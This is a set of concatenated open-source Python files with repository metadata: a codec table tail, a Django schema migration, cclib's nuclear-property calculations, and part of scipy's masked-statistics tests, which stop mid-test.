u'\xfa' # 0xFA -> LATIN SMALL LETTER U WITH ACUTE
u'\xfb' # 0xFB -> LATIN SMALL LETTER U WITH CIRCUMFLEX
u'\xfc' # 0xFC -> LATIN SMALL LETTER U WITH DIAERESIS
u'\u016d' # 0xFD -> LATIN SMALL LETTER U WITH BREVE
u'\u015d' # 0xFE -> LATIN SMALL LETTER S WITH CIRCUMFLEX
u'\u02d9' # 0xFF -> DOT ABOVE
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
| apache-2.0 |
heeraj123/oh-mainline | mysite/profile/migrations/0089_auto__add_field_person_irc_nick.py | 17 | 16925 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Person.irc_nick'
db.add_column('profile_person', 'irc_nick', self.gf('django.db.models.fields.CharField')(max_length=30, null=True, blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Person.irc_nick'
db.delete_column('profile_person', 'irc_nick')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'customs.webresponse': {
'Meta': {'object_name': 'WebResponse'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'response_headers': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.IntegerField', [], {}),
'text': ('django.db.models.fields.TextField', [], {}),
'url': ('django.db.models.fields.TextField', [], {})
},
'profile.citation': {
'Meta': {'object_name': 'Citation'},
'contributor_role': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'data_import_attempt': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.DataImportAttempt']", 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.utcnow'}),
'distinct_months': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'first_commit_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored_due_to_duplicate': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'languages': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'old_summary': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True'}),
'portfolio_entry': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.PortfolioEntry']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
'profile.dataimportattempt': {
'Meta': {'object_name': 'DataImportAttempt'},
'completed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.utcnow'}),
'failed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'query': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'web_response': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['customs.WebResponse']", 'null': 'True'})
},
'profile.forwarder': {
'Meta': {'object_name': 'Forwarder'},
'address': ('django.db.models.fields.TextField', [], {}),
'expires_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1970, 1, 1, 0, 0)'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'stops_being_listed_on': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1970, 1, 1, 0, 0)'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'profile.link_person_tag': {
'Meta': {'object_name': 'Link_Person_Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"})
},
'profile.link_project_tag': {
'Meta': {'object_name': 'Link_Project_Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Tag']"})
},
'profile.link_sf_proj_dude_fm': {
'Meta': {'unique_together': "[('person', 'project')]", 'object_name': 'Link_SF_Proj_Dude_FM'},
'date_collected': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_admin': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.SourceForgePerson']"}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.SourceForgeProject']"})
},
'profile.person': {
'Meta': {'object_name': 'Person'},
'bio': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'blacklisted_repository_committers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['profile.RepositoryCommitter']", 'symmetrical': 'False'}),
'contact_blurb': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'dont_guess_my_location': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_me_weekly_re_projects': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'expand_next_steps': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'gotten_name_from_ohloh': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'homepage_url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'irc_nick': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'last_polled': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1970, 1, 1, 0, 0)'}),
'location_confirmed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'location_display_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'photo': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100'}),
'photo_thumbnail': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100', 'null': 'True'}),
'photo_thumbnail_20px_wide': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100', 'null': 'True'}),
'photo_thumbnail_30px_wide': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '100', 'null': 'True'}),
'show_email': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'profile.portfolioentry': {
'Meta': {'ordering': "('-sort_order', '-id')", 'object_name': 'PortfolioEntry'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.utcnow'}),
'experience_description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_archived': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"}),
'project_description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'receive_maintainer_updates': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'sort_order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'use_my_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'profile.repositorycommitter': {
'Meta': {'unique_together': "(('project', 'data_import_attempt'),)", 'object_name': 'RepositoryCommitter'},
'data_import_attempt': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.DataImportAttempt']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['search.Project']"})
},
'profile.sourceforgeperson': {
'Meta': {'object_name': 'SourceForgePerson'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'profile.sourceforgeproject': {
'Meta': {'object_name': 'SourceForgeProject'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'unixname': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'profile.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tag_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.TagType']"}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'profile.tagtype': {
'Meta': {'object_name': 'TagType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'profile.unsubscribetoken': {
'Meta': {'object_name': 'UnsubscribeToken'},
'created_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profile.Person']"}),
'string': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'search.project': {
'Meta': {'object_name': 'Project'},
'cached_contributor_count': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True'}),
'created_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'date_icon_was_fetched_from_ohloh': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'display_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200'}),
'homepage': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'icon_for_profile': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_for_search_result': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_raw': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'icon_smaller_for_badge': ('django.db.models.fields.files.ImageField', [], {'default': 'None', 'max_length': '100', 'null': 'True'}),
'icon_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'logo_contains_name': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'people_who_wanna_help': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'projects_i_wanna_help'", 'symmetrical': 'False', 'to': "orm['profile.Person']"})
}
}
complete_apps = ['profile']
| agpl-3.0 |
berquist/cclib | cclib/method/nuclear.py | 3 | 7039 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2020, the cclib development team
#
# This file is part of cclib (http://cclib.github.io) and is distributed under
# the terms of the BSD 3-Clause License.
"""Calculate properties of nuclei based on data parsed by cclib."""
import logging
import numpy as np
from cclib.method.calculationmethod import Method
from cclib.parser.utils import PeriodicTable
from cclib.parser.utils import find_package
_found_periodictable = find_package("periodictable")
if _found_periodictable:
import periodictable as pt
_found_scipy = find_package("scipy")
if _found_scipy:
import scipy.constants
def _check_periodictable(found_periodictable):
if not _found_periodictable:
raise ImportError("You must install `periodictable` to use this function")
def _check_scipy(found_scipy):
if not _found_scipy:
raise ImportError("You must install `scipy` to use this function")
def get_most_abundant_isotope(element):
    """Given a `periodictable` element, return its most abundant isotope."""
    # Start from the first listed isotope so something sensible is returned
    # even when no candidate reports a positive abundance.
    best_isotope = element.isotopes[0]
    best_abundance = 0
    for candidate in element:
        if candidate.abundance > best_abundance:
            best_isotope = candidate
            best_abundance = candidate.abundance
    return best_isotope
def get_isotopic_masses(charges):
    """Return the masses for the given nuclei, represented by their
    nuclear charges.
    """
    _check_periodictable(_found_periodictable)
    # One entry per nucleus: look the element up by its charge and take the
    # mass of its most abundant isotope.
    return np.array([get_most_abundant_isotope(pt.elements[charge]).mass
                     for charge in charges])
class Nuclear(Method):
    """A container for methods pertaining to atomic nuclei."""

    def __init__(self, data, progress=None, loglevel=logging.INFO, logname="Log"):
        # Parsed-data attributes that every method of this class relies on.
        self.required_attrs = ('natom', 'atomcoords', 'atomnos', 'charge')
        super(Nuclear, self).__init__(data, progress, loglevel, logname)

    def __str__(self):
        """Return a string representation of the object."""
        return "Nuclear"

    def __repr__(self):
        """Return a representation of the object."""
        return "Nuclear"

    def stoichiometry(self):
        """Return the stoichiometry of the object according to the Hill system."""
        cclib_pt = PeriodicTable()
        elements = [cclib_pt.element[ano] for ano in self.data.atomnos]
        counts = {el: elements.count(el) for el in set(elements)}

        formula = ""
        elcount = lambda el, c: "%s%i" % (el, c) if c > 1 else el
        # Hill system: carbon first, then hydrogen (only when carbon is
        # present), then all remaining elements alphabetically.
        if 'C' in elements:
            formula += elcount('C', counts['C'])
            counts.pop('C')
            if 'H' in elements:
                formula += elcount('H', counts['H'])
                counts.pop('H')
        for el, c in sorted(counts.items()):
            formula += elcount(el, c)

        # Append the net charge, e.g. "(+2)" or "(-1)", when non-zero.
        if getattr(self.data, 'charge', 0):
            magnitude = abs(self.data.charge)
            sign = "+" if self.data.charge > 0 else "-"
            formula += "(%s%i)" % (sign, magnitude)
        return formula

    def repulsion_energy(self, atomcoords_index=-1):
        """Return the nuclear repulsion energy.

        Sums Z_i * Z_j / d(i, j) over all unique nuclear pairs of the
        geometry selected by `atomcoords_index`.
        """
        nre = 0.0
        # Use one and the same geometry for both atoms of every pair.
        coords = self.data.atomcoords[atomcoords_index]
        for i in range(self.data.natom):
            ri = coords[i]
            zi = self.data.atomnos[i]
            for j in range(i + 1, self.data.natom):
                # Bug fix: this previously read ``atomcoords[0][j]``, taking
                # atom j from the *first* geometry regardless of the
                # requested atomcoords_index.
                rj = coords[j]
                zj = self.data.atomnos[j]
                d = np.linalg.norm(ri - rj)
                nre += zi * zj / d
        return nre

    def center_of_mass(self, atomcoords_index=-1):
        """Return the center of mass, weighting each nucleus by the mass of
        its most abundant isotope."""
        charges = self.data.atomnos
        coords = self.data.atomcoords[atomcoords_index]
        masses = get_isotopic_masses(charges)

        mwc = coords * masses[:, np.newaxis]
        numerator = np.sum(mwc, axis=0)
        denominator = np.sum(masses)

        return numerator / denominator

    def moment_of_inertia_tensor(self, atomcoords_index=-1):
        """Return the moment of inertia tensor."""
        charges = self.data.atomnos
        coords = self.data.atomcoords[atomcoords_index]
        masses = get_isotopic_masses(charges)

        moi_tensor = np.empty((3, 3))

        moi_tensor[0][0] = np.sum(masses * (coords[:, 1] ** 2 + coords[:, 2] ** 2))
        moi_tensor[1][1] = np.sum(masses * (coords[:, 0] ** 2 + coords[:, 2] ** 2))
        moi_tensor[2][2] = np.sum(masses * (coords[:, 0] ** 2 + coords[:, 1] ** 2))

        # NOTE(review): the off-diagonal elements are stored as *positive*
        # products of inertia here; the conventional inertia tensor negates
        # them. Preserved as-is — confirm against cclib's reference results.
        moi_tensor[0][1] = np.sum(masses * coords[:, 0] * coords[:, 1])
        moi_tensor[0][2] = np.sum(masses * coords[:, 0] * coords[:, 2])
        moi_tensor[1][2] = np.sum(masses * coords[:, 1] * coords[:, 2])

        # Mirror the off-diagonal entries: the tensor is symmetric.
        moi_tensor[1][0] = moi_tensor[0][1]
        moi_tensor[2][0] = moi_tensor[0][2]
        moi_tensor[2][1] = moi_tensor[1][2]

        return moi_tensor

    def principal_moments_of_inertia(self, units='amu_bohr_2'):
        """Return the principal moments of inertia in 3 kinds of units:
        1. [amu][bohr]^2
        2. [amu][angstrom]^2
        3. [g][cm]^2
        and the principal axes.

        Raises
        ------
        ValueError
            If `units` is not one of the three supported choices.
        """
        choices = ('amu_bohr_2', 'amu_angstrom_2', 'g_cm_2')
        units = units.lower()
        if units not in choices:
            raise ValueError("Invalid units, pick one of {}".format(choices))
        moi_tensor = self.moment_of_inertia_tensor()
        # eigh: the tensor is symmetric, so use the symmetric eigensolver,
        # which also returns the eigenvalues in ascending order.
        principal_moments, principal_axes = np.linalg.eigh(moi_tensor)
        if units == "amu_bohr_2":
            _check_scipy(_found_scipy)
            bohr2ang = scipy.constants.value("atomic unit of length") / scipy.constants.angstrom
            conv = 1 / bohr2ang ** 2
        elif units == "amu_angstrom_2":
            # Coordinates are already in angstroms; nothing to convert.
            conv = 1
        elif units == "g_cm_2":
            _check_scipy(_found_scipy)
            amu2g = scipy.constants.value("unified atomic mass unit") * scipy.constants.kilo
            conv = amu2g * (scipy.constants.angstrom / scipy.constants.centi) ** 2
        return conv * principal_moments, principal_axes

    def rotational_constants(self, units='ghz'):
        """Compute the rotational constants in 1/cm or GHz.

        Raises
        ------
        ValueError
            If `units` is neither 'invcm' nor 'ghz'.
        """
        choices = ('invcm', 'ghz')
        units = units.lower()
        if units not in choices:
            raise ValueError("Invalid units, pick one of {}".format(choices))
        principal_moments = self.principal_moments_of_inertia("amu_angstrom_2")[0]
        _check_scipy(_found_scipy)
        bohr2ang = scipy.constants.value('atomic unit of length') / scipy.constants.angstrom
        xfamu = 1 / scipy.constants.value('electron mass in u')
        xthz = scipy.constants.value('hartree-hertz relationship')
        rotghz = xthz * (bohr2ang ** 2) / (2 * xfamu * scipy.constants.giga)
        if units == 'ghz':
            conv = rotghz
        elif units == 'invcm':
            ghz2invcm = scipy.constants.giga * scipy.constants.centi / scipy.constants.c
            conv = rotghz * ghz2invcm
        return conv / principal_moments
del find_package
| bsd-3-clause |
Weihonghao/ECM | Vpy34/lib/python3.5/site-packages/scipy/stats/tests/test_mstats_basic.py | 16 | 53339 | """
Tests for the stats.mstats module (support for masked arrays)
"""
from __future__ import division, print_function, absolute_import
import warnings
import numpy as np
from numpy import nan
import numpy.ma as ma
from numpy.ma import masked, nomask
import scipy.stats.mstats as mstats
from scipy import stats
from common_tests import check_named_results
from numpy.testing import TestCase, run_module_suite
from numpy.testing.decorators import skipif
from numpy.ma.testutils import (assert_equal, assert_almost_equal,
assert_array_almost_equal, assert_array_almost_equal_nulp, assert_,
assert_allclose, assert_raises, assert_array_equal)
class TestMquantiles(TestCase):
    """Tests for mstats.mquantiles."""

    def test_mquantiles_limit_keyword(self):
        # Regression test for Trac ticket #867: the ``limit`` keyword must
        # exclude out-of-range values (the -999 sentinels) per column.
        data = np.array([[6., 7., 1.],
                         [47., 15., 2.],
                         [49., 36., 3.],
                         [15., 39., 4.],
                         [42., 40., -999.],
                         [41., 41., -999.],
                         [7., -999., -999.],
                         [39., -999., -999.],
                         [43., -999., -999.],
                         [40., -999., -999.],
                         [36., -999., -999.]])
        expected = [[19.2, 14.6, 1.45],
                    [40.0, 37.5, 2.5],
                    [42.8, 40.05, 3.55]]
        computed = mstats.mquantiles(data, axis=0, limit=(0, 50))
        assert_almost_equal(computed, expected)
class TestGMean(TestCase):
    """Tests for mstats.gmean (geometric mean) on plain and masked input."""

    def test_1D(self):
        """Geometric mean of a 1-D sequence, with and without a mask."""
        a = (1,2,3,4)
        actual = mstats.gmean(a)
        desired = np.power(1*2*3*4,1./4.)
        assert_almost_equal(actual, desired, decimal=14)

        desired1 = mstats.gmean(a,axis=-1)
        assert_almost_equal(actual, desired1, decimal=14)
        # A plain (unmasked) input must not come back as a MaskedArray.
        assert_(not isinstance(desired1, ma.MaskedArray))

        # Masked entries are excluded from the product.
        a = ma.array((1,2,3,4),mask=(0,0,0,1))
        actual = mstats.gmean(a)
        desired = np.power(1*2*3,1./3.)
        assert_almost_equal(actual, desired,decimal=14)

        desired1 = mstats.gmean(a,axis=-1)
        assert_almost_equal(actual, desired1, decimal=14)

    @skipif(not hasattr(np, 'float96'), 'cannot find float96 so skipping')
    def test_1D_float96(self):
        """gmean honours an extended-precision ``dtype`` where the platform
        provides one."""
        a = ma.array((1,2,3,4), mask=(0,0,0,1))
        actual_dt = mstats.gmean(a, dtype=np.float96)
        desired_dt = np.power(1 * 2 * 3, 1. / 3.).astype(np.float96)
        assert_almost_equal(actual_dt, desired_dt, decimal=14)
        assert_(actual_dt.dtype == desired_dt.dtype)

    def test_2D(self):
        """Geometric mean of a masked 2-D array along axis 0 (the default)
        and axis -1."""
        a = ma.array(((1, 2, 3, 4), (1, 2, 3, 4), (1, 2, 3, 4)),
                     mask=((0, 0, 0, 0), (1, 0, 0, 1), (0, 1, 1, 0)))
        actual = mstats.gmean(a)
        desired = np.array((1,2,3,4))
        assert_array_almost_equal(actual, desired, decimal=14)

        desired1 = mstats.gmean(a,axis=0)
        assert_array_almost_equal(actual, desired1, decimal=14)

        actual = mstats.gmean(a, -1)
        desired = ma.array((np.power(1*2*3*4,1./4.),
                            np.power(2*3,1./2.),
                            np.power(1*4,1./2.)))
        assert_array_almost_equal(actual, desired, decimal=14)
class TestHMean(TestCase):
    """Tests for mstats.hmean (harmonic mean) on plain and masked input."""

    def test_1D(self):
        """Harmonic mean of a 1-D sequence, with and without a mask."""
        a = (1,2,3,4)
        actual = mstats.hmean(a)
        desired = 4. / (1./1 + 1./2 + 1./3 + 1./4)
        assert_almost_equal(actual, desired, decimal=14)
        desired1 = mstats.hmean(ma.array(a),axis=-1)
        assert_almost_equal(actual, desired1, decimal=14)

        # Masked entries are excluded from the reciprocal sum.
        a = ma.array((1,2,3,4),mask=(0,0,0,1))
        actual = mstats.hmean(a)
        desired = 3. / (1./1 + 1./2 + 1./3)
        assert_almost_equal(actual, desired,decimal=14)
        desired1 = mstats.hmean(a,axis=-1)
        assert_almost_equal(actual, desired1, decimal=14)

    @skipif(not hasattr(np, 'float96'), 'cannot find float96 so skipping')
    def test_1D_float96(self):
        """hmean honours an extended-precision ``dtype`` where the platform
        provides one."""
        a = ma.array((1,2,3,4), mask=(0,0,0,1))
        actual_dt = mstats.hmean(a, dtype=np.float96)
        desired_dt = np.asarray(3. / (1./1 + 1./2 + 1./3),
                                dtype=np.float96)
        assert_almost_equal(actual_dt, desired_dt, decimal=14)
        assert_(actual_dt.dtype == desired_dt.dtype)

    def test_2D(self):
        """Harmonic mean of a masked 2-D array along axis 0 (the default)
        and axis -1."""
        a = ma.array(((1,2,3,4),(1,2,3,4),(1,2,3,4)),
                     mask=((0,0,0,0),(1,0,0,1),(0,1,1,0)))
        actual = mstats.hmean(a)
        desired = ma.array((1,2,3,4))
        assert_array_almost_equal(actual, desired, decimal=14)

        actual1 = mstats.hmean(a,axis=-1)
        desired = (4./(1/1.+1/2.+1/3.+1/4.),
                   2./(1/2.+1/3.),
                   2./(1/1.+1/4.)
                   )
        assert_array_almost_equal(actual1, desired, decimal=14)
class TestRanking(TestCase):
    """Tests for mstats.rankdata on masked arrays."""
    # The original class defined an ``__init__`` that merely forwarded its
    # arguments to ``TestCase.__init__`` unchanged; that override was
    # redundant and has been removed.

    def test_ranking(self):
        """rankdata: tie handling, masked values, ``use_missing`` and the
        ``axis`` keyword."""
        x = ma.array([0,1,1,1,2,3,4,5,5,6,])
        # Ties receive averaged ranks (the three 1s share rank 3).
        assert_almost_equal(mstats.rankdata(x),
                            [1,3,3,3,5,6,7,8.5,8.5,10])
        x[[3,4]] = masked
        # Masked entries get rank 0 by default...
        assert_almost_equal(mstats.rankdata(x),
                            [1,2.5,2.5,0,0,4,5,6.5,6.5,8])
        # ...or the average of the missing ranks when use_missing=True.
        assert_almost_equal(mstats.rankdata(x, use_missing=True),
                            [1,2.5,2.5,4.5,4.5,4,5,6.5,6.5,8])
        x = ma.array([0,1,5,1,2,4,3,5,1,6,])
        assert_almost_equal(mstats.rankdata(x),
                            [1,3,8.5,3,5,7,6,8.5,3,10])
        x = ma.array([[0,1,1,1,2], [3,4,5,5,6,]])
        # Without an axis the flattened array is ranked; axis=0/1 rank
        # within columns/rows respectively.
        assert_almost_equal(mstats.rankdata(x),
                            [[1,3,3,3,5], [6,7,8.5,8.5,10]])
        assert_almost_equal(mstats.rankdata(x, axis=1),
                            [[1,3,3,3,5], [1,2,3.5,3.5,5]])
        assert_almost_equal(mstats.rankdata(x,axis=0),
                            [[1,1,1,1,1], [2,2,2,2,2,]])
class TestCorr(TestCase):
    """Tests for the masked-array correlation functions in mstats."""

    def test_pearsonr(self):
        # Tests some computations of Pearson's r
        x = ma.arange(10)

        with warnings.catch_warnings():
            # The tests in this context are edge cases, with perfect
            # correlation or anticorrelation, or totally masked data.
            # None of these should trigger a RuntimeWarning.
            warnings.simplefilter("error", RuntimeWarning)

            assert_almost_equal(mstats.pearsonr(x, x)[0], 1.0)
            assert_almost_equal(mstats.pearsonr(x, x[::-1])[0], -1.0)

            x = ma.array(x, mask=True)
            pr = mstats.pearsonr(x, x)
            # Fully masked input yields masked r and p values.
            assert_(pr[0] is masked)
            assert_(pr[1] is masked)

        x1 = ma.array([-1.0, 0.0, 1.0])
        y1 = ma.array([0, 0, 3])
        r, p = mstats.pearsonr(x1, y1)
        assert_almost_equal(r, np.sqrt(3)/2)
        assert_almost_equal(p, 1.0/3)

        # (x2, y2) have the same unmasked data as (x1, y1).
        mask = [False, False, False, True]
        x2 = ma.array([-1.0, 0.0, 1.0, 99.0], mask=mask)
        y2 = ma.array([0, 0, 3, -1], mask=mask)
        r, p = mstats.pearsonr(x2, y2)
        # Masking the extra pair must not change the result.
        assert_almost_equal(r, np.sqrt(3)/2)
        assert_almost_equal(p, 1.0/3)

    def test_spearmanr(self):
        # Tests some computations of Spearman's rho
        (x, y) = ([5.05,6.75,3.21,2.66],[1.65,2.64,2.64,6.95])
        assert_almost_equal(mstats.spearmanr(x,y)[0], -0.6324555)
        # NaNs are masked out by fix_invalid, so rho is unchanged.
        (x, y) = ([5.05,6.75,3.21,2.66,np.nan],[1.65,2.64,2.64,6.95,np.nan])
        (x, y) = (ma.fix_invalid(x), ma.fix_invalid(y))
        assert_almost_equal(mstats.spearmanr(x,y)[0], -0.6324555)

        x = [2.0, 47.4, 42.0, 10.8, 60.1, 1.7, 64.0, 63.1,
             1.0, 1.4, 7.9, 0.3, 3.9, 0.3, 6.7]
        y = [22.6, 8.3, 44.4, 11.9, 24.6, 0.6, 5.7, 41.6,
             0.0, 0.6, 6.7, 3.8, 1.0, 1.2, 1.4]
        assert_almost_equal(mstats.spearmanr(x,y)[0], 0.6887299)
        x = [2.0, 47.4, 42.0, 10.8, 60.1, 1.7, 64.0, 63.1,
             1.0, 1.4, 7.9, 0.3, 3.9, 0.3, 6.7, np.nan]
        y = [22.6, 8.3, 44.4, 11.9, 24.6, 0.6, 5.7, 41.6,
             0.0, 0.6, 6.7, 3.8, 1.0, 1.2, 1.4, np.nan]
